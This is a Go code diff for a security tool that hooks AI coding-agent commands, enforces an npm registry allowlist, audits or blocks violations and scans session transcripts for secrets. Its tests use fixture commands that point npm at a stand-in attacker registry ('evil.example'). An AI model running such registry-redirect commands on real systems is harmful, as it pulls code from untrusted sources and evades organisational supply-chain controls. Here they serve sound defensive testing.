+func commandKindFor(parsed policy.ParsedCommand, ev *event.Event) string { + switch parsed.ConfigOp { + case "set": + return "config_set" + case "delete": + return "config_delete" + case "edit": + return "config_edit" + } + if ev.Enrichments != nil && ev.Enrichments.PackageManager != nil { + if k := ev.Enrichments.PackageManager.CommandKind; k != "" { + return k + } + } + return "other" +} + +// normalizePM collapses execution-only siblings onto their config-owning +// counterpart so managed-key lookups in policy.Eval find the right table. +// `npx` does not own configuration; `npm` does. +func normalizePM(bin string) string { + switch bin { + case "npx": + return "npm" + case "pnpx": + return "pnpm" + case "bunx": + return "bun" + } + return bin +} + +// bypassFor maps a policy decision code onto the audit-only Bypass tag. +// Returns "" for non-bypass codes (allow, missing data, etc). +func bypassFor(code policy.DecisionCode) string { + switch code { + case policy.CodeRegistryFlag: + return "registry_flag" + case policy.CodeRegistryEnv: + return "env_var" + case policy.CodeUserconfigFlag: + return "userconfig_flag" + case policy.CodeManagedKeyMutation: + return "config_set" + case policy.CodeManagedKeyEdit: + return "config_edit" + } + return "" +} diff --git a/internal/aiagents/hook/policy_test.go b/internal/aiagents/hook/policy_test.go new file mode 100644 index 0000000..82b64c3 --- /dev/null +++ b/internal/aiagents/hook/policy_test.go @@ -0,0 +1,368 @@ +package hook + +import ( + "bytes" + "context" + "encoding/json" + "strings" + "testing" + "time" + + cc "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/claudecode" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/policy" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// builtinAllowedRegistry mirrors the single-element allowlist shipped in +// 
internal/aiagents/policy/builtin/policy.json. The hook now enforces the +// embedded policy unconditionally, so tests assert against that allowlist +// directly. +const builtinAllowedRegistry = "https://registry.stepsecurity.io/" + +func runWith(t *testing.T, payload string, hookType event.HookEvent) (map[string]any, *event.Event) { + t.Helper() + return runWithPolicy(t, payload, hookType, nil) +} + +func runWithPolicy(t *testing.T, payload string, hookType event.HookEvent, pol *policy.Policy) (map[string]any, *event.Event) { + t.Helper() + stdin := strings.NewReader(payload) + var stdout, stderr bytes.Buffer + cap := &captured{} + rt := &Runtime{ + Adapter: cc.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"), + Exec: executor.NewMock(), + Stdin: stdin, + Stdout: &stdout, + Stderr: &stderr, + Now: func() time.Time { return time.Now().UTC() }, + Policy: pol, + UploadEvent: cap.capture(), + LogError: cap.logError(), + } + _ = rt.Run(context.Background(), hookType) + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes()) + } + if len(cap.events) == 0 { + return resp, nil + } + ev := cap.events[0] + return resp, &ev +} + +// blockModePolicy returns a copy of the embedded policy with mode=block. +func blockModePolicy() *policy.Policy { + p := policy.Builtin() + p.Mode = policy.ModeBlock + return &p +} + +// expectAllowResponse asserts the wire-format is allow. +func expectAllowResponse(t *testing.T, resp map[string]any) { + t.Helper() + if resp["continue"] != true { + t.Errorf("expected continue=true, got %v", resp) + } + if _, ok := resp["decision"]; ok { + t.Errorf("allow response must not carry decision field, got %v", resp) + } +} + +// expectBlockResponse asserts the spec-compliant PreToolUse block shape: +// hookSpecificOutput.permissionDecision="deny" plus a generic reason. 
+// MUST NOT contain continue:false (which would halt the agent entirely) +// nor the deprecated top-level decision/reason/stopReason fields. +func expectBlockResponse(t *testing.T, resp map[string]any) { + t.Helper() + if v, ok := resp["continue"]; ok && v == false { + t.Errorf("block response must not emit continue:false (halts agent), got %v", resp) + } + for _, k := range []string{"decision", "reason", "stopReason"} { + if _, ok := resp[k]; ok { + t.Errorf("block response must not carry deprecated field %q, got %v", k, resp) + } + } + hso, ok := resp["hookSpecificOutput"].(map[string]any) + if !ok { + t.Fatalf("block response missing hookSpecificOutput: %v", resp) + } + if hso["hookEventName"] != "PreToolUse" { + t.Errorf("hookEventName: %v", hso["hookEventName"]) + } + if hso["permissionDecision"] != "deny" { + t.Errorf("permissionDecision: %v", hso["permissionDecision"]) + } + reason, _ := hso["permissionDecisionReason"].(string) + if !strings.Contains(reason, "Blocked by your organization") { + t.Errorf("permissionDecisionReason not generic block message: %v", reason) + } +} + +// Test 1: Built-in policy defaults to audit; a violation persists a finding +// and emits an allow response (Allowed reflects the effective response). 
+func TestAuditDefaultRegistryFlagViolationAllowsAndAudits(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPreToolUse) + + expectAllowResponse(t, resp) + + pd := ev.PolicyDecision + if pd == nil { + t.Fatalf("policy_decision missing: %+v", ev) + } + if pd.Mode != "audit" { + t.Errorf("mode: %v", pd.Mode) + } + if !pd.Allowed { + t.Errorf("audit-mode allowed must reflect effective response (true), got %v", pd.Allowed) + } + if !pd.WouldBlock { + t.Errorf("would_block: %v", pd.WouldBlock) + } + if pd.Enforced { + t.Errorf("enforced must be false in audit mode, got %v", pd.Enforced) + } + if pd.Bypass != "registry_flag" { + t.Errorf("bypass: %v", pd.Bypass) + } + if !strings.Contains(pd.InternalDetail, "evil.example") { + t.Errorf("internal_detail should name the registry: %v", pd.InternalDetail) + } + // Audit-mode wire response is allow; no place for detail to leak. + if _, ok := resp["hookSpecificOutput"]; ok { + t.Errorf("audit-mode response must not carry hookSpecificOutput, got %v", resp) + } +} + +// Test 2: Audit-mode managed-key mutation persists a finding and allows. +func TestAuditDefaultManagedKeyMutationAllowsAndAudits(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm config set registry https://evil.example/"}}`, event.HookPreToolUse) + + expectAllowResponse(t, resp) + + pd := ev.PolicyDecision + if pd == nil { + t.Fatalf("policy_decision missing: %+v", ev) + } + if !pd.Allowed { + t.Errorf("audit-mode allowed: %v", pd.Allowed) + } + if !pd.WouldBlock { + t.Errorf("would_block: %v", pd.WouldBlock) + } + if pd.Mode != "audit" { + t.Errorf("mode: %v", pd.Mode) + } +} + +// Test 3: Block-mode registry violation persists enforced=true and emits block. 
+func TestBlockModeRegistryFlagViolationBlocks(t *testing.T) { + resp, ev := runWithPolicy(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPreToolUse, blockModePolicy()) + + expectBlockResponse(t, resp) + leak := func(s string) bool { + return strings.Contains(s, "evil.example") || strings.Contains(s, "lodash") || strings.Contains(s, "npmrc") + } + hso, _ := resp["hookSpecificOutput"].(map[string]any) + pdr, _ := hso["permissionDecisionReason"].(string) + if leak(pdr) { + t.Errorf("block-mode permissionDecisionReason leaked detail: %q", pdr) + } + + pd := ev.PolicyDecision + if pd == nil { + t.Fatalf("policy_decision missing: %+v", ev) + } + if pd.Mode != "block" { + t.Errorf("mode: %v", pd.Mode) + } + if pd.Allowed { + t.Errorf("block-mode allowed must reflect effective response (false), got %v", pd.Allowed) + } + if !pd.WouldBlock { + t.Errorf("would_block: %v", pd.WouldBlock) + } + if !pd.Enforced { + t.Errorf("enforced: %v", pd.Enforced) + } + if pd.Bypass != "registry_flag" { + t.Errorf("bypass: %v", pd.Bypass) + } + if !strings.Contains(pd.InternalDetail, "evil.example") { + t.Errorf("internal_detail should name the registry: %v", pd.InternalDetail) + } +} + +// Test 4: Block-mode managed-key mutation blocks. 
+func TestBlockModeManagedKeyMutationBlocks(t *testing.T) { + resp, ev := runWithPolicy(t, `{"tool_name":"Bash","tool_input":{"command":"npm config set registry https://evil.example/"}}`, event.HookPreToolUse, blockModePolicy()) + + expectBlockResponse(t, resp) + + pd := ev.PolicyDecision + if pd == nil || !pd.Enforced || pd.Allowed { + t.Errorf("expected enforced block, got %+v", pd) + } +} + +func TestPolicyUsesEnrichmentRegistry(t *testing.T) { + rt := &Runtime{Policy: blockModePolicy()} + ev := &event.Event{ + HookEvent: event.HookPreToolUse, + ActionType: event.ActionCommandExec, + Payload: map[string]any{ + "tool_input": map[string]any{"command": "npm install lodash"}, + }, + Enrichments: &event.Enrichments{ + PackageManager: &event.PackageManagerInfo{ + Detected: true, + Name: "npm", + CommandKind: "install", + Registry: "https://evil.example/", + }, + }, + } + + info, decision := rt.evaluatePolicy(context.Background(), ev, "npm install lodash") + + if info == nil { + t.Fatal("expected policy decision") + } + if info.Registry != "https://evil.example/" { + t.Errorf("registry: %q", info.Registry) + } + if decision.Allow { + t.Errorf("expected block decision") + } +} + +// A synthetic future-agent event that carries a non-Claude native hook +// name still evaluates policy because the gate is normalized over +// HookPhase. This pins the multi-agent invariant: policy never branches +// on agent-specific HookEvent values. 
+func TestPolicyGateUsesHookPhaseNotNativeName(t *testing.T) { + rt := &Runtime{Policy: blockModePolicy()} + cmd := "npm install --registry=https://evil.example/ x" + ev := &event.Event{ + HookEvent: "tool.execute.before", // not any Claude constant + HookPhase: event.HookPhasePreTool, + ActionType: event.ActionCommandExec, + Enrichments: &event.Enrichments{ + PackageManager: &event.PackageManagerInfo{ + Detected: true, Name: "npm", CommandKind: "install", + }, + }, + } + if !shouldEvaluatePolicy(ev, cmd) { + t.Fatal("phase-based gate must pass for pre_tool + command_exec + cmd") + } + info, decision := rt.evaluatePolicy(context.Background(), ev, cmd) + if info == nil || decision.Allow { + t.Fatalf("expected block decision for phase-driven evaluation: info=%v decision=%v", info, decision) + } + + // And the gate must reject events whose phase is wrong, even when the + // shell command and action_type would otherwise fit. + ev.HookPhase = event.HookPhasePostTool + if shouldEvaluatePolicy(ev, cmd) { + t.Errorf("post_tool phase must not trigger policy") + } +} + +// Test 5: Audit allowlisted flag → no violation; allowed:true, would_block:false. +func TestAuditAllowlistedFlagNoFinding(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=`+builtinAllowedRegistry+` lodash"}}`, event.HookPreToolUse) + + expectAllowResponse(t, resp) + + pd := ev.PolicyDecision + if pd == nil || !pd.Allowed { + t.Errorf("expected allowed=true on allowlisted flag, got %+v", pd) + } + if pd != nil && pd.WouldBlock { + t.Errorf("would_block should be false, got %v", pd.WouldBlock) + } +} + +// Test 6: Disabled ecosystem emits no policy_decision (no noise). 
+func TestDisabledEcosystemSuppressesPolicyDecision(t *testing.T) { + pol := policy.Builtin() + npm := pol.Ecosystems[policy.EcosystemNPM] + npm.Enabled = false + pol.Ecosystems[policy.EcosystemNPM] = npm + + resp, ev := runWithPolicy(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPreToolUse, &pol) + + expectAllowResponse(t, resp) + if ev.PolicyDecision != nil { + t.Errorf("disabled ecosystem must not emit policy_decision, got %+v", ev.PolicyDecision) + } +} + +// Test 7: PostToolUse never evaluates policy. +func TestPolicySkipsPostToolUse(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPostToolUse) + + expectAllowResponse(t, resp) + if ev.PolicyDecision != nil { + t.Errorf("policy stage should not run for PostToolUse: %+v", ev.PolicyDecision) + } +} + +// Test 8: Unknown ecosystem produces no policy_decision. +func TestPolicySkipsUnknownEcosystem(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"pip install foo"}}`, event.HookPreToolUse) + + expectAllowResponse(t, resp) + if ev.PolicyDecision != nil { + t.Errorf("policy_decision should not be present for unenforced ecosystem: %+v", ev.PolicyDecision) + } +} + +// Regression: when CLI arg disagrees with payload hook_event_name, the +// runtime must use one hook type for both policy evaluation and response +// rendering. The invoked CLI hook is authoritative; the payload mismatch +// is audit evidence only. +func TestHookEventNameMismatchKeepsPolicyAndResponseInSync(t *testing.T) { + // CLI arg = PreToolUse, payload says PostToolUse. Since the invoked hook + // is authoritative, block-mode policy should evaluate and block. 
+	payload := `{"hook_event_name":"PostToolUse","tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`
+	resp, ev := runWithPolicy(t, payload, event.HookPreToolUse, blockModePolicy())
+
+	expectBlockResponse(t, resp)
+	pd := ev.PolicyDecision
+	if pd == nil || !pd.Enforced || pd.Allowed {
+		t.Errorf("expected enforced policy decision, got %+v", pd)
+	}
+	// Mismatch annotation must be present in errors.
+	found := false
+	for _, e := range ev.Errors {
+		if e.Code == "hook_event_name_mismatch" {
+			found = true
+			break
+		}
+	}
+	if !found {
+		t.Errorf("expected hook_event_name_mismatch error annotation, got errors=%+v", ev.Errors)
+	}
+}
+
+// Audit-mode findings keep their detail in internal_detail (the audit
+// channel) but the user-facing wire response never names the registry.
+func TestAuditFindingDetailGoesToTelemetryNotWire(t *testing.T) {
+	resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPreToolUse)
+
+	expectAllowResponse(t, resp)
+
+	// Wire response is allow with no detail.
+	if _, ok := resp["hookSpecificOutput"]; ok {
+		t.Errorf("allow response must not carry hookSpecificOutput, got %v", resp)
+	}
+
+	pd := ev.PolicyDecision
+	if pd == nil || !strings.Contains(pd.InternalDetail, "evil.example") {
+		t.Errorf("internal_detail must record the violating registry for audit: %+v", pd)
+	}
+}
diff --git a/internal/aiagents/hook/runtime.go b/internal/aiagents/hook/runtime.go
new file mode 100644
index 0000000..47120da
--- /dev/null
+++ b/internal/aiagents/hook/runtime.go
@@ -0,0 +1,361 @@
+// Package hook implements the bounded, fail-open hot path invoked by
+// `stepsecurity-dev-machine-guard _hook <agent> <hook-event>`. Every stage
+// MUST be capped, redaction-first, and resilient to internal errors:
+// the agent waits for stdout, so a failure here can never become a
+// non-zero exit or a stalled response.
+// +// Persistence-by-design omission: this package does NOT write +// events.jsonl. The only on-disk artifact is the errors log appended +// through the LogError seam; the event itself is either delivered to +// UploadEvent or dropped. +package hook + +import ( + "context" + "encoding/json" + "errors" + "io" + "os" + "strings" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/enrich/mcp" + "github.com/step-security/dev-machine-guard/internal/aiagents/enrich/npm" + "github.com/step-security/dev-machine-guard/internal/aiagents/enrich/secrets" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/identity" + "github.com/step-security/dev-machine-guard/internal/aiagents/ingest" + "github.com/step-security/dev-machine-guard/internal/aiagents/policy" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// Every hook invocation MUST honor these caps. +// +// CapHook bounds the worst-case agent stall on a hung invocation. It is +// 15s to absorb the 1s identity probe and a +// 5s upload under load. The agent's own hook timeout (Claude Code +// defaults to 60s) is the absolute ceiling above us. +const ( + CapHook = 15 * time.Second + CapPM = 10 * time.Second + CapMCP = 10 * time.Second + CapSecretMin = 30 * time.Second + CapSecretMax = 60 * time.Second + MaxStdinBytes = 5 * 1024 * 1024 // 5 MiB +) + +// UploadTimeout is the per-invocation cap on the synchronous upload +// stage. Mirrors ingest.DefaultHookUploadTimeout; kept here so the +// runtime stays decoupled from the ingest package's HTTP client. +const UploadTimeout = 5 * time.Second + +// Runtime wires every dependency the hot path needs. +// +// All fields are exported so tests and the CLI handler can construct a +// Runtime by struct literal. 
Production code prefers NewRuntime, which +// fills in defaults (real executor, os.Std{in,out,err}, UTC clock). +type Runtime struct { + Adapter adapter.Adapter + Exec executor.Executor + Stdin io.Reader + Stdout io.Writer + Stderr io.Writer + Now func() time.Time + + // Policy, when non-nil, overrides the embedded builtin. Production + // code leaves this nil; tests inject mode/allowlist variants. + Policy *policy.Policy + + // UploadEvent is the synchronous backend ingestion seam. nil means + // upload is disabled — the local-only behavior the runtime falls + // back to whenever enterprise config is missing. Production wires + // this to an ingest.Client closure via cli.newUploader; tests + // inject a capture function. The event passed in already carries + // customer_id, device_id, and user_identity stamped from the same + // identity.Resolve call, so the seam intentionally does not take a + // separate identity argument. + UploadEvent func(ctx context.Context, ev event.Event) error + + // LogError is the errors.jsonl appender seam. nil means errors are + // silently dropped — fail-open is the contract; logging is best + // effort. Production wires this to cli.AppendError; tests can + // capture the calls by setting their own function. Signature + // matches cli.AppendError(stage, code, message, eventID). + LogError func(stage, code, message, eventID string) +} + +// NewRuntime constructs the default runtime for the given adapter. The +// hook package no longer knows about any concrete adapter; agent +// selection is the CLI's job. +func NewRuntime(a adapter.Adapter) *Runtime { + return &Runtime{ + Adapter: a, + Exec: executor.NewReal(), + Stdin: os.Stdin, + Stdout: os.Stdout, + Stderr: os.Stderr, + Now: func() time.Time { return time.Now().UTC() }, + } +} + +// Run executes one hook invocation. It always writes an adapter-compatible +// response to stdout, even on internal failure. 
The default verdict is +// allow; only an explicit policy match flips it to block. +// +// The returned error, if any, is purely informational for the CLI exit +// path: the CLI swallows it so the process exit code stays 0. +func (rt *Runtime) Run(parent context.Context, hookType event.HookEvent) error { + ctx, cancel := context.WithTimeout(parent, CapHook) + defer cancel() + + // The deferred emit reads these captured variables. Defaults: allow + // decision, no parsed event (the parse may fail before `ev` is set). + // The policy stage is the only thing that overwrites `decision`. Any + // failure path leaves it at allow, preserving fail-open. The closure + // reads both at deferred-execution time, so later assignments to `ev` + // and `decision` are visible. + decision := adapter.AllowDecision() + var ev *event.Event + defer func() { rt.emitDecidedResponse(ev, decision) }() + + cfg, _ := ingest.Snapshot() + id := identity.Resolve(ctx, rt.Exec, cfg.CustomerID) + upload := rt.resolveUpload() + + raw, readErr := readBounded(rt.Stdin, MaxStdinBytes) + if readErr != nil { + if errors.Is(readErr, errInputTooLarge) { + rt.logError("stdin", "input_too_large", readErr.Error(), "") + return readErr + } + rt.logError("stdin", "read_error", readErr.Error(), "") + return readErr + } + + parsed, parseErr := rt.Adapter.ParseEvent(ctx, hookType, raw) + if parseErr != nil { + rt.logError("parse", "parse_error", parseErr.Error(), "") + return parseErr + } + ev = parsed + + // Stamp identity. AgentVersion is intentionally not stamped here — + // it would have to come from the adapter or hook payload, and Claude + // Code does not include it in the hook payload today. The field stays + // empty until there is a real source. + ev.CustomerID = id.CustomerID + ev.UserIdentity = id.UserIdentity + ev.DeviceID = id.DeviceID + + // Classify before enrichment so even fast paths get the bool flags. + classify(ev) + + // From here on, ev.HookEvent is the source of truth. 
ParseEvent keeps it + // aligned with the CLI hook arg and records any payload hook_event_name + // mismatch in ev.Errors, so policy evaluation and response rendering use + // the same hook type. + + // Extract the shell command once. The adapter owns shell extraction; + // the runtime hands the redacted command to enrichments and policy. + shellCmd, shellCwd, hasShell := rt.Adapter.ShellCommand(ev) + + // Run enrichments under their own caps. + rt.runEnrichments(ctx, ev, shellCmd, shellCwd, hasShell) + + // Policy evaluation. Fail-open: only an explicit block decision + // overwrites `decision`; every error path inside leaves the default + // allow in place. Phase-based gate keeps cross-agent correctness: + // pre_tool + command_exec + a shell command in hand. + if shouldEvaluatePolicy(ev, shellCmd) { + if info, d := rt.evaluatePolicy(ctx, ev, shellCmd); info != nil { + ev.PolicyDecision = info + if !d.Allow { + decision = d + } + } + } + + // Re-redact final event (defense in depth) before upload. + if ev.Payload != nil { + if m, ok := redact.Value(ev.Payload).(map[string]any); ok { + ev.Payload = m + } + } + + // Synchronous upload, fail-open. The agent response has not been + // emitted yet — the deferred emit fires after Run returns — so any + // time spent here directly delays the agent. The upload context is + // capped at UploadTimeout to bound that delay even when the backend + // hangs. + // + // Failure is recorded only in errors.jsonl; the event is dropped. + if upload != nil { + uploadCtx, cancel := context.WithTimeout(ctx, UploadTimeout) + uploadErr := upload(uploadCtx, *ev) + cancel() + if uploadErr != nil { + rt.logError("ingest", "upload_error", uploadErr.Error(), ev.EventID) + } + } + return nil +} + +// resolveUpload picks the upload function for this hook invocation. +// Tests override Runtime.UploadEvent directly; production code wires +// it through cli.newUploader, which returns nil whenever enterprise +// config is missing. 
A nil UploadEvent disables upload — the +// local-only fallback we want without enterprise credentials. +func (rt *Runtime) resolveUpload() func(context.Context, event.Event) error { + return rt.UploadEvent +} + +// emitDecidedResponse writes the adapter's wire-format response for the +// final decision. Both ev and dec are captured by the deferred closure +// in Run so the values reflect whatever the runtime had reached when +// it returned. ev is nil on parse-error paths; the adapter handles that +// as allow. +// +// Errors marshaling are intentionally swallowed; both Claude Code and +// Codex accept an empty body as "allow", so we always succeed at fail-open. +func (rt *Runtime) emitDecidedResponse(ev *event.Event, dec adapter.Decision) { + resp := rt.Adapter.DecideResponse(ev, dec) + b, err := json.Marshal(resp) + if err != nil { + _, _ = io.WriteString(rt.Stdout, "{}\n") + return + } + _, _ = rt.Stdout.Write(b) + _, _ = io.WriteString(rt.Stdout, "\n") +} + +// logError forwards to the LogError seam. nil seam means errors are +// silently dropped, preserving the fail-open contract end-to-end. +func (rt *Runtime) logError(stage, code, message, eventID string) { + if rt.LogError == nil { + return + } + rt.LogError(stage, code, message, eventID) +} + +func classify(ev *event.Event) { + cls := event.Classifications{} + switch ev.ActionType { + case event.ActionCommandExec: + cls.IsShellCommand = true + case event.ActionFileRead, event.ActionFileWrite, event.ActionFileDelete: + cls.IsFileOperation = true + case event.ActionNetworkRequest: + cls.IsNetworkActivity = true + case event.ActionMCPInvocation: + cls.IsMCPRelated = true + } + // Lifecycle MCP signals: phase alone (or tool_name prefix on + // permission phases) is enough to set the broad filter, no enrichment + // block required. Branching on HookPhase rather than the native + // HookEvent keeps this correct for any future adapter whose native + // hook names differ from Claude's. 
+	switch ev.HookPhase {
+	case event.HookPhaseElicitation, event.HookPhaseElicitationResult:
+		cls.IsMCPRelated = true
+	case event.HookPhasePermissionRequest, event.HookPhasePermissionDenied:
+		if strings.HasPrefix(strings.ToLower(ev.ToolName), "mcp__") {
+			cls.IsMCPRelated = true
+		}
+	}
+	if !cls.IsZero() {
+		ev.Classifications = &cls
+	}
+}
+
+func (rt *Runtime) runEnrichments(parent context.Context, ev *event.Event, cmd, cwd string, hasShell bool) {
+	// Shell command capture + package-manager enrichment.
+	if hasShell {
+		ev.Enrichments = ensureEnrich(ev.Enrichments)
+		ev.Enrichments.Shell = &event.ShellEnrichment{
+			Command:          truncate(redact.String(cmd), 4096),
+			CommandTruncated: len(cmd) > 4096,
+			WorkingDirectory: cwd,
+		}
+		// Package manager
+		pmCtx, cancel := context.WithTimeout(parent, CapPM)
+		started := time.Now()
+		pmInfo, pmTimedOut := npm.Enrich(pmCtx, cmd, cwd)
+		cancel()
+		if pmInfo != nil {
+			ev.Enrichments.PackageManager = pmInfo
+			if ev.Classifications == nil {
+				ev.Classifications = &event.Classifications{}
+			}
+			ev.Classifications.IsPackageManager = pmInfo.Detected
+		}
+		if pmTimedOut {
+			ev.Timeouts = append(ev.Timeouts, event.TimeoutInfo{
+				Stage: "package_manager", Cap: CapPM, Elapsed: time.Since(started),
+			})
+			rt.logError("enrich_pm", "enrichment_timeout", "package manager enrichment exceeded cap", "")
+		}
+
+		// MCP from shell evidence: only emitted when parsing the
+		// command actually surfaces a server. Direct mcp__<server>__<tool>
+		// tool events, MCP permission events, and Elicitation hooks
+		// produce no MCPInfo block — their server identity is already
+		// in tool_name or the payload. classify() sets is_mcp_related
+		// for those cases from the hook event alone.
+ mcpCtx, cancelMCP := context.WithTimeout(parent, CapMCP) + startedMCP := time.Now() + mcpInfo, mcpTimedOut := mcp.ClassifyShell(mcpCtx, cmd) + cancelMCP() + if mcpInfo != nil { + ev.Enrichments.MCP = mcpInfo + if ev.Classifications == nil { + ev.Classifications = &event.Classifications{} + } + ev.Classifications.IsMCPRelated = true + } + if mcpTimedOut { + ev.Timeouts = append(ev.Timeouts, event.TimeoutInfo{ + Stage: "mcp", Cap: CapMCP, Elapsed: time.Since(startedMCP), + }) + rt.logError("enrich_mcp", "enrichment_timeout", "mcp enrichment exceeded cap", "") + } + } + + // Session-end secret scanner. Bounded and runs only when a transcript + // path is present in the payload. Phase-keyed so any adapter mapping + // its session-end equivalent to HookPhaseSessionEnd gets the scan. + if ev.HookPhase == event.HookPhaseSessionEnd { + transcript, _ := ev.Payload["transcript_path"].(string) + if transcript != "" { + scanCtx, cancel := context.WithTimeout(parent, CapSecretMin) + started := time.Now() + info, timedOut := secrets.ScanTranscript(scanCtx, transcript) + cancel() + if info != nil { + ev.Enrichments = ensureEnrich(ev.Enrichments) + ev.Enrichments.Secrets = info + } + if timedOut { + ev.Timeouts = append(ev.Timeouts, event.TimeoutInfo{ + Stage: "secret_scan", Cap: CapSecretMin, Elapsed: time.Since(started), + }) + rt.logError("enrich_secrets", "enrichment_timeout", "secret scan exceeded cap", "") + } + } + } +} + +func ensureEnrich(e *event.Enrichments) *event.Enrichments { + if e != nil { + return e + } + return &event.Enrichments{} +} + +func truncate(s string, n int) string { + if len(s) <= n { + return s + } + return s[:n] +} diff --git a/internal/aiagents/hook/runtime_test.go b/internal/aiagents/hook/runtime_test.go new file mode 100644 index 0000000..52db61d --- /dev/null +++ b/internal/aiagents/hook/runtime_test.go @@ -0,0 +1,420 @@ +package hook + +import ( + "bytes" + "context" + "encoding/json" + "errors" + "io" + "strings" + "sync" + "testing" + "time" 
+ + cc "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/claudecode" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// captured holds the events the runtime hands to UploadEvent during a +// test. UploadEvent is the single test seam for inspecting the +// constructed event. +type captured struct { + mu sync.Mutex + events []event.Event + errs []errLogEntry +} + +type errLogEntry struct { + Stage, Code, Message, EventID string +} + +func (c *captured) capture() func(context.Context, event.Event) error { + return func(_ context.Context, ev event.Event) error { + c.mu.Lock() + defer c.mu.Unlock() + c.events = append(c.events, ev) + return nil + } +} + +func (c *captured) logError() func(stage, code, message, eventID string) { + return func(stage, code, message, eventID string) { + c.mu.Lock() + defer c.mu.Unlock() + c.errs = append(c.errs, errLogEntry{stage, code, message, eventID}) + } +} + +func newRuntime(t *testing.T, stdin io.Reader, stdout, stderr io.Writer) (*Runtime, *captured) { + t.Helper() + cap := &captured{} + rt := &Runtime{ + Adapter: cc.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"), + Exec: executor.NewMock(), + Stdin: stdin, + Stdout: stdout, + Stderr: stderr, + Now: func() time.Time { return time.Now().UTC() }, + UploadEvent: cap.capture(), + LogError: cap.logError(), + } + return rt, cap +} + +func TestRunHappyPathBashHook(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"abc", + "cwd":"/tmp/work", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash","cwd":"/tmp/work"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatalf("Run: %v", err) + } + // stdout MUST be a Claude-compatible allow response. 
+ var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes()) + } + if resp["continue"] != true { + t.Errorf("expected continue=true, got %v", resp["continue"]) + } + + if len(cap.events) != 1 { + t.Fatalf("expected 1 uploaded event, got %d", len(cap.events)) + } + ev := cap.events[0] + if ev.HookEvent != event.HookPreToolUse { + t.Errorf("hook_event: %v", ev.HookEvent) + } + if ev.ActionType != event.ActionCommandExec { + t.Errorf("action_type: %v", ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsShellCommand { + t.Errorf("expected is_shell_command classification: %+v", ev.Classifications) + } + if !ev.Classifications.IsPackageManager { + t.Errorf("expected is_package_manager classification: %+v", ev.Classifications) + } +} + +func TestRunMalformedPayloadReturnsAllow(t *testing.T) { + stdin := strings.NewReader(`{not valid json`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + + err := rt.Run(context.Background(), event.HookPreToolUse) + if err == nil { + t.Fatal("expected internal error on parse failure") + } + // Even on parse failure stdout must still be the allow response. + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes()) + } + if resp["continue"] != true { + t.Errorf("expected continue=true even on parse failure, got %v", resp) + } + // No event uploaded when ParseEvent fails — the runtime drops the + // event and only logs the error to errors.jsonl. + if len(cap.events) != 0 { + t.Errorf("expected no upload on parse failure, got %d", len(cap.events)) + } + // The error must surface through the logger seam. 
+ found := false + for _, e := range cap.errs { + if e.Stage == "parse" && e.Code == "parse_error" { + found = true + break + } + } + if !found { + t.Errorf("expected parse_error in error log, got %+v", cap.errs) + } +} + +func TestRunInputTooLargeReturnsAllow(t *testing.T) { + big := bytes.Repeat([]byte("a"), int(MaxStdinBytes)+10) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, bytes.NewReader(big), &stdout, &stderr) + + err := rt.Run(context.Background(), event.HookPreToolUse) + if !errors.Is(err, errInputTooLarge) { + t.Fatalf("expected errInputTooLarge, got %v", err) + } + if !strings.HasPrefix(strings.TrimSpace(stdout.String()), "{") { + t.Errorf("stdout should be JSON allow response: %q", stdout.String()) + } + // Oversize payload short-circuits before parse → no upload, errlog hit. + if len(cap.events) != 0 { + t.Errorf("expected no upload on input_too_large, got %d", len(cap.events)) + } + found := false + for _, e := range cap.errs { + if e.Stage == "stdin" && e.Code == "input_too_large" { + found = true + break + } + } + if !found { + t.Errorf("expected input_too_large in error log, got %+v", cap.errs) + } +} + +// Direct mcp__ tool invocation flows through PreToolUse with +// action_type:"mcp_invocation" and is_mcp_related:true. No +// enrichments.mcp block — the server identity already lives in +// tool_name; backends split it at query time. 
